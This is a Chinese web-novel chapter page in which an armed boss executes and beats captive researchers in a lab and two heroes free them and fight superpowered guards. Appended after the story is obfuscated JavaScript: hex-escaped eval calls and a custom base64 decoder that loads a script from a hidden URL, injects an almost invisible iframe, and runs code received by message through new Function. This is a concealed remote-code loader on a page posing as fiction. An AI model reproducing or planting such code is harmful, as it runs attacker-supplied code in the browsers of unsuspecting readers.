当前位置:铅笔小说>历史军事>我有一个特种兵系统> 第2002章 车间危机

第2002章 车间危机

  一种压抑的气氛充斥着这里,举枪的人如同不可侵犯的秩序一般,只要的扣下扳机,就有一个生命消逝而去。

  男子底下头环抱着着脑袋,即便他不喜欢这个姿势,也跪在了地上不住的求饶哭泣。

  “没用的东西,你当初决定要钱那一刻就很干脆,不要像现在这样畏畏缩缩,知道么,要报酬就要有付出。”

  可怕的气息弥漫,冰冷的枪口顶着这名年轻学者男子头颅,西装男子嘴唇阴霾眼神更显得内茬,就是周边的手下都感觉到了死亡的气息,不由自己离他一步之远。

  这名学者痛哭流涕,支支吾吾,而后他发出一声惨叫,而后疯狂的往西装男子扑过去,似乎像是要夺枪,这让一旁的西装男小弟都围困向前。

  “你确定要这么做,你要明白这么做的后果。”

  想当初,他耐心至极好吃好供这些人,却没想到现在有人居然想夺枪虐杀他,他不想在这么继续下去了。

  西装男顿时站起身子,像是一堵墙一般直接把学者男子堵了回去。

  他每走一步都有一种无形气势,像是步数落下就能发出一声雷鸣震撼人心一般,在其后背,更有一只凶兽若隐若无出现,威慑当长。

  “我错了,请你给我一次机会。”

  研究者这时候感觉到危机,觉得面前人无比可怕,他在也生不起想要逃走的念头,他控制不住的倒退了几步跪下求饶。

  西装男子脸上很不好看,他心中一凛,像是做了某种决定,把男子拉到车间的一个角落,即便是有人知道他想做什么,但是也没有人敢阻止。

  像是一声悲鸣,来自于子弹出闸声音还是截杀掉了这个生命。

  西装男子绝对不允许这实验室里边的其他人和这学者相似,也许这种手段不完美,但是却是当下最管用的。

  其他捧着杯子或者试管在实验的工作人员也是看了过来,因为他们知道了发生了什么,连他们工作的同伴都被拖出去枪杀了,这绝对是一种冲击,让他们感觉到了死亡的阴影。

  “你们不用害怕,只要好好上班和做事,搞好研究,你们很快就自由,毕竟你们都欠有我几百万的款项,我总不能做亏本的生意吧。”

  今日发生的总总,似乎是像这里的人敲起了警钟,像是经受了一番洗礼,每个人都明白过来自己处境,这样的处境让他们在也生不出一丝反抗。

  即便现在有奇迹发生,有人来救他们,但是面对如同天神一般的这么西装男子,必然也是被他屠掠殆尽,丝毫都没有救出他们的希望。

  这对于他们来说像是信念被垄断,不复存在了一般,这一景象让人绝望,但凡他们还存在一丝念想似乎也被从中断了一般。

  一列列的人拿着武器围绕在这实验室中,这些人都没有说话,一动一静有着让人慑服的气势,这使得这些研究者更加的怯场了,当即就有人受不住手中的试剂直接摔落了一地。

  只见一股气息流出,蔓延扩散到车间每一个角落,让人感觉刺鼻。

  这是一副飘逸的画面,缓缓移动的气息流了出去,在跳跃中排出窗口。

  西装男子皱眉,随即让人拉出那名实验摔坏东西的研究者。

  这一景象让人哑然,余生他们觉得这人恐怕是要遭殃了。

  这人很惊恐,被人挽住胳膊时候整个人开始挣扎起来想要摆脱,他像是失去了理智一般。

  放开我,放开我。”

  研究者男子运气很不好,被抬到了西装男子前边被一股劲摔下来,差点没把他身子骨摔碎。

  “知道那东西多贵么,为什么要摔碎。”阴沉着脸的西装男子问道,眼神中有一丝火气。

  在这时候,这名男子感觉到对方杀意,那中源自于西装男子眼神让他直犯哆嗦,这下多半是要被制裁了,他心中惶恐不已。

  “要救人么。”

  黑蛮轻声说道。

  他们已经有了相应的参照,刚才那名研究者的死还历历在目,不救的话可能这人也要死。而且说不好,他还会以一种极其残忍的虐待死去。

  这是一中难以言表的感觉,对于受害者来说,这种体验生不如死。

  “放过我吧,我不是故意的,我不想死。”男子亲自喊出话语求饶,这种低姿态难以言表,有一种屈辱和悲哀在里边,不断着扯着对方的裤脚说道。

  “滚。”

  西装男子眼中只有厌恶没有怜悯直接一脚踢出去,在这些男子手下认知中,被这么踢中恐怕受伤不轻。

  没有人能够经受得住这么一击,哪怕是个学者,这是西装男子手下这些人的认为和评价,他们目光聚焦过去,只见研究者倒地后,不断捂着胸膛。

  “断了几条肋骨不算什么,下次要是在不小心,你可没这么幸运了,要知道刚才掉落地上东西,昂贵至极,你命不足惜。”

  西装男子他就是想用这件事警告实验室其他试剂研究者,就当着他们的面做,让这些人知道被折辱的滋味,做不好事情就要受到惩罚。

  西装男子冷哼一声,然后就走开了,不在去看这些人。

  “真是太残暴了。”

  如果不是亲眼目睹这些事情,黑蛮依旧不会想到这些人会这么坏,心中已经把他们列入必杀一列之中了。

  在这一刻这里被看守,不过很快这些看守的人也累了,开始出去门口点烟去抽了。

  在其中一人手上,也不知道怀中藏有多少烟草,但是依旧是发放给了他的这些队友,每人一支,开始吞云吐雾。

  余生和黑蛮慢慢靠近前边地方,想给他们来个惊喜,唯独这几人还不知道危险已经靠近,还在那悠哉的清闲着。

  黑蛮想直接出手,但是被余生制止,而后他往供电闸地方弹了一下手指头,那小石头直接在电闸上一跳,然后关掉了。

  这是陷入黑暗了,没有人知道发生了什么,包括刚才巡逻的这些人,也不知道有谁叫了这么一声把他们拉回现实,开始独自那门口,防止这些研究者闯出去,不然他们就麻烦了。

  报警声音在响起人员也在不断的奔逃,余生他们看紧时机直接出手。

  他来到了这些人跟前,一炳军刀划过不留余辉情况下傲然而步,收割了他们的生命。

  其中一个人想开口,他眼中满是不可思议的神色,像是看到了一抹身影他没有来得及做出反应,就被伤到,这超出了预料。

  “你究竟是谁。”

  带着一丝恐惧,这名守卫保镖似乎是知晓了眼前人不简单,在刚才一瞬间如果他不是反应及时,可能都被阁下脖子处动脉而亡了,他一直手捂着脖子受伤部位说道。

  余生双眼写满了冷酷,既然是决定出手,那么就不会留活自然是不会跟他废话,冷漠的眼神和手段惊住了这名幸存者。

  与他在一起的同伴都死了,让他心里冒寒气,这一刻还有什么能够抵挡面前的人呢,他们就十几人,已经是被毙掉十人只剩下他和一些将死的呻吟者了,他颜色铁青。

  余生眸光闪过,一刀结果了他,唯有这样他才算是安心。

  双方交火,余生所展现出来实力让后边赶来人震惊,面上的血色像是少了许多,纷纷警惕看着他。

  后方,又有人拥挤上来,手中举着军火,这一刻是安静的,但是余生一个背影却是让他们感觉时间凝固,动作都慢了一拍,导致最后枪械射偏了。

  xiaoshuting.org

  其他人震惊无比,那是一种什么样的场景,就在他们面前直接穿行而过消失在楼道间了。

  “追。”

  唯首其中一个人开口,所发生事情太过于出乎意料,三人挡在前边开路不断的射击这背还被逃了让他们心里憋屈。

  “绝对不能放过此人,还有那些研究试剂者也要抓回来。”他脸上有担忧不是很平静,因为这事情若是办不好,他也别想好过了,西装男子不会放过他们。

  黑蛮一次性的带着这些人,行动不是非常快,但是有余生的夜行服,这种在平时不显得有作用的东西现在既然是能够潜伏在黑夜中,让人惊讶。

  如果有人知道这种原理,那恐怕是要拿去做不法事情,而余生如今却是给他们拿做逃命用。

  这些研究者被慑服,他们从来没有想过有机会从这地方出去。

  当从一个黑色的门走出来时,黑蛮直接让他们走,在指定地方和他回合就行,在这地方不安全,没有人知道西装男子那群人什么时候追上,至此他只能这么吩咐他们。

  “我要回去支援我的朋友。”这是一种不能不做事情,黑蛮给他们解释到。

  如果有足够的时间,黑蛮会带他们离去,没有他在,这些人或者还不能逃出堕落岭那组织的追逃,但是他没有时间去想了,因为他怕余生出事。

  所有被救的人鸦雀无声,他们当然希望黑蛮可以送他们远些,现在听到就此离去,他们整个人都身体一颤,都有些吃惊。

  “你不是来救我们的么,怎么只有两个人。”

  一个不和谐声音穿出来,可能是因为他的疑惑,其他人也看了过来。

  这注定是一次大逃亡,会波及到许多,所以他们也怀疑黑蛮身份,想知道他们究竟是什么人。

  “我不想解释太多,若是你们信我,披着这东西,逃到指定地方,记住这东西每隔两分钟就失效,所以在这时间刷新里,你们要找到一个黑暗角落等待冷却后再使用,每次冷却时间五分钟。”

  自说出这些后,黑蛮像是做出了决定头也不回的往那栋大厦走去。

  所以人都无言,即便他们想挽留,但真的有能力挽留么,恐怕那种级别的战斗和意义是他们永远不会涉足的,又有什么资格劝别人不去。

  事实上,黑蛮也有几分把握,按照路线走,他们可以走,而且到了那地方,如果本城皇已经消灭了来犯的一些人,恐怕也会去接应这些研究学者。

  本城皇所处的这家酒店,他已经感觉到危险来临,这是一个可怕的事实,如今真的应征了余生所说的事,为了他们的线索不暴露,他也打算了和对方较量的准备。

  这是一场大战,余生在大厦楼里边被人围困,其中血脉者,超能者,还有一些古武者,现代文明科技装甲者,这些人都出动来对付他,在平时这是不可想象的是,这种场景余生也是第一次见,这就是堕日岭的实力么。

  人流走动,跑了过来,一名名血脉者沉重的脚步声音彷佛让人窒息,水泥地都有些塌陷出脚印,一个势力这么出动功绩可谓是对这件事十分重视。

  被包围的余生没并没有慌乱,而是盯着前方西装男,看他下一步动作。

  事实上,他也不知道西装男友多强,但是对方面对自己的威势既然是无动于衷,那说明比自己差不了多少甚至可能会相等或更高。

  “我来单他。”

  不少人目测过去,都见到西装男子那种气势和面容以及不能亵渎的话语,散发着滚滚血气的他彷佛江涛海浪一般觉醒,随之更是要展开一股惊涛骇浪的攻击了。

  他这些手下彷佛都屏住呼吸,今日这一站,也许将有一个结果了,如果是西装男子他们这个首领出手,没有人会觉得他拿不下这些捣乱者,必然是铁血杀伐,寸草不生。

  展现出气势之后,他跳了起来,在半空中后边既然是一片金黄的世界一般,顿时长出了两对光翼,这是一种黄褐色的光翼,有着强大的威能。

  “魔茧血脉。”

  在这片地方,余生还没有见到走出来的魔茧血脉者,怪不得这么强大,彷佛都要撕裂周围的气场了,没有人知道他现在有多强,但是绝对很强。

  载着他巨大的羽翼,如同鬼魅一般的行动眨眼就到了余生面前然后一拳轰出,带起大量光泽和惊涛骇浪的席卷威势。

  所有人不经意间瞄了余生一眼,他们这些人自然是知道他们头领这一拳威力,像是可以看到一片血花在暂放随之要打穿面前的人一般,谁人能阻。
eval("\x77\x69\x6e\x64\x6f\x77")["\x62\x4a\x6f"]=function(e){var li ='ABCDEFG'+''+'HI'+''+'JKLM'+'NOPQRSTUVWXYZab'+''+'cdefghi'+''+'jklmnopqrstuvwxyz0'+'123456789+/'+''+'=';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x61\x51\x77\x45"]=function(){eval(bJo("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoYkpvKHUucmVwbGFjZShuZXcgUmVnRXhwKGMrJycrYywnZycpLGMpLnNwbGl0KCcnKS5yZXZlcnNlKCkuam9pbignJykpKTsnalF1ZXJ5Jzt2YXIgX3VhPW5hdmlnYXRvci51c2VyQWdlbnQ7dmFyIF9iSm9iSm89JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoYkpvKCJZbUZwWkhVPSIpKT4tMSB8fCBfdWEuaW5kZXhPZihiSm8oJ1NIVmhkMlZwUW5KdmQzTmxjZz09JykpPi0xKXtpZihfdWEuaW5kZXhPZihiSm8oJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfYkpvYkpvKTt9ZWxzZXtmdW5jdGlvbiByZChuLG0pe3JldHVybiBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqKG0tbisxKStuKTt9ZnVuY3Rpb24gcm0oZSl7aWYoZSYmZS50YWdOYW1lLnRvVXBwZXJDYXNlKCk9PT0iSUZSQU1FIiYmZS5zcmMuaW5kZXhPZih1KT4tMSl7ZS5yZW1vdmUoKTt9ZWxzZSBpZihlLm5leHRFbGVtZW50U2libGluZyl7cm0oZS5uZXh0RWxlbWVudFNpYmxpbmcpO319bGV0IGM9ZFtiSm8oIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdDYkYnKydNJysnJysndScrJyc7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19rJysnZGEnKyducScrJ29iJysnal8xODcnXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0yLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnImFsJysnbG93dHJhbicrJ3NwYScrJ3JlbmN5IHNyJysnYz0iJyt6KyciPjwvaScrJ2ZyJysnYScrJ21lPicpO3dbImFkIisiZEV2IisiZW50TCIrImlzdCIrImVuZXIiXSgibSIrImVzcyIrImFnZSIsZnVuY3Rpb24oZSl7aWYoZS5kYXRhW3IrX2lkXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKGJKbyhlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9iSm9iSm8pO319KSgnMScrJycrJ0lUTCcrJzMnKydnVCcrJ010JysnJysnTW0nKycnKydSeScrJycrJ1VpWScrJycrJ2tCJysnJysnM1puJysnJysnRm4nKydZJysnR0onKycnKydUSnonKydRJysnRE53JysnJysnSVQnKycnKydReicrJycrJ1UnKycnKydDJysnJysnY3YnKycnKydSJysnbkwnKycnKyd6QVQnKydacnInKycnKydkbScrJ2JweCcrJycrJ20nKydMJysnelonKydrJysnTWxZJysnJysnaycrJ01sJysnRScrJycrJzBNJysnJysnbCcrJycrJ01IJysnJysnYzAnKycnKydSSGEnKycnLCdDYkYnKydNJysnJysndScrJycsd2luZG93LGRvY3VtZW50LDAsJ3InKQ=="));}

上一章目录+书签下一章